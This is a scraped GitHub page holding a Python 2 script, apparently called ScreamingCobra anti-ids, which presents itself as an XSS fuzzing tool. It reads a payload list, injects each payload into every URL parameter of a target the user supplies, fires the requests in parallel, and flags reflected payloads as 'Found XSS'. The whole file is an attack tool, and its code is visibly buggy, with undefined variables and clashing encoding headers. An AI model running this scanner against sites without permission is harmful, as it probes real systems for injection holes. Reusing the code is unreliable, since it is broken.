forked from HackerUniverse/ScreamingCobra
-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathScreamingCobra_anti-ids_post1.py
145 lines (119 loc) · 6.53 KB
/
ScreamingCobra_anti-ids_post1.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
#!/usr/bin/env python
# coding: latin-1
# -*- coding: utf-8 -*-
# coding: utf-8
# coding: UTF-8
# coding: UTF-16
# coding: utf-16
# Imports
import html, sys, httplib2, re, requests, urllib2, urlparse, json, time, httplib, cookielib, urllib, httplib, urllib, socket, urlparse, os, sys, time, mechanize
from threadpool import *
from termcolor import colored
# Clear system terminal
os.system("clear")
none_ascii = '''
███████╗ ██████╗██████╗ ███████╗ █████╗ ███╗ ███╗██╗███╗ ██╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ █████╗
██╔════╝██╔════╝██╔══██╗██╔════╝██╔══██╗████╗ ████║██║████╗ ██║██╔════╝ ██╔════╝██╔═══██╗██╔══██╗██╔══██╗██╔══██╗
███████╗██║ ██████╔╝█████╗ ███████║██╔████╔██║██║██╔██╗ ██║██║ ███╗ ██║ ██║ ██║██████╔╝██████╔╝███████║
╚════██║██║ ██╔══██╗██╔══╝ ██╔══██║██║╚██╔╝██║██║██║╚██╗██║██║ ██║ ██║ ██║ ██║██╔══██╗██╔══██╗██╔══██║
███████║╚██████╗██║ ██║███████╗██║ ██║██║ ╚═╝ ██║██║██║ ╚████║╚██████╔╝ ╚██████╗╚██████╔╝██████╔╝██║ ██║██║ ██║
╚══════╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝
XSS Fuzz Swiss Knife, version 1.0'''
print "" # Information
print colored('[ Coder ]', 'red'), colored(' Haroon Awan', 'white')
print colored('[ Programmer ]', 'red'), colored(' Shadab Siddique', 'white')
print colored('[ Contact ] ', 'red'), colored('[email protected]', 'white')
print colored('[ Instagram ] ', 'red'), colored('hackeruniversee, hackerfromscratch', 'white')
print colored('[ Facebook ] ', 'red'), colored('Https://www.facebook.com/officialharoonawan', 'white')
print colored('[ Github ] ', 'red'), colored('Https://www.github.com/haroonawanofficial', 'white')
print(none_ascii.decode('utf-8'))
# Target
print colored('[+] ', 'red'), colored('Target Settings', 'white')
# Configurations
DEBUG = True
MAX_THREAD_COUNT = 10
PAYLOADS_FILENAME = 'upperpayload'
SCHEME_DELIMITER = '://'
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
intt=0
# Define attack routine
def attack(url, payload):
t_start = time.time()
return_dict = dict()
return_dict['url'] = url
return_dict['vulnerability'] = False
try:
return_dict['method'] = 'POST'
XSS_RESPONSE=payload
attack= urllib2.urlopen(url).read()
index = attack.find(XSS_RESPONSE)
buffer = 20
print_url=url.replace("<","<").replace(">",">")
attack = attack.split("\n");
len(attack)
if index != -1:
return_dict[' vulnerability'] = True
print colored('[-] ', 'red'), colored('Found XSS', 'white'), print_url
return_dict['vulnerability_data'] = line.strip()
intt=intt+1
print intt
else:
return_dict['vulnerability'] = False
print colored('[-] ', 'red'), colored('Not Vulernerable', 'white'), print_url
return_dict['vulnerability_data'] = line.strip()
intt=intt+1
print intt
t_end = time.time()
return_dict['time'] = round((t_end - t_start), 2)
except KeyboardInterrupt, ke:
sys.exit(0)
except Exception, e:
return_dict['exception'] = str(e)
if __name__ == '__main__':
# Init
t_global_start = time.time()
payloads_file = open(PAYLOADS_FILENAME)
threadpool = ThreadPool(MAX_THREAD_COUNT)
print colored('[+] ', 'red'), colored('Enter Absolute Parameter, URI, URL:', 'green')
sites = str(raw_input("[-] "))
print colored('[+] ', 'red'), colored('Loaded Parallel Engine', 'green')
print colored('[+] ', 'red'), colored('Loaded Payloads', 'green')
print colored('[+] ', 'red'), colored('Performing XSS Tests', 'green')
payloads = []
for payload in payloads_file:
payloads.append(payload[:-1])
# Extract Base URL and Parameters from site
parse_url = urlparse.urlparse(sites)
base_url = '%s%s%s%s' % (parse_url.scheme, SCHEME_DELIMITER, parse_url.netloc, parse_url.path)
#print base_url
param_parse_list = urlparse.urlparse(sites)[4].split(' ')
param_dict = dict()
for param_parse_entry in param_parse_list:
tmp = param_parse_entry.split(' ')
param_dict[tmp[0]] = tmp[0]
# Loop through payloads
for payload in payloads:
# Loop through parameters
for k1, v1 in iter(sorted(param_dict.iteritems())):
# Build GET param string and POST param dict
get_params = ''
post_params = dict()
for k2, v2 in iter(sorted(param_dict.iteritems())):
if k1 == k2:
get_params += '%s%s&' % (k2, payload)
post_params[k2] = payload
else:
get_params += '%s%s&' % (k2, v2)
post_params[k2] = v2
get_params = get_params[:-1]
# Enqueue GET attack
get_attack_url = '%s?%s' % (base_url, get_params)
threadpool.enqueue(attack, get_attack_url, payload)
# Wait for threadpool
threadpool.wait()
# Exit
t_global_end = time.time()
#if DEBUG:
if(intt == 0):
print colored('[!] ', 'red'), colored('Time taken for parallel scan : %.2f seconds', 'green') % (t_global_end - t_global_start)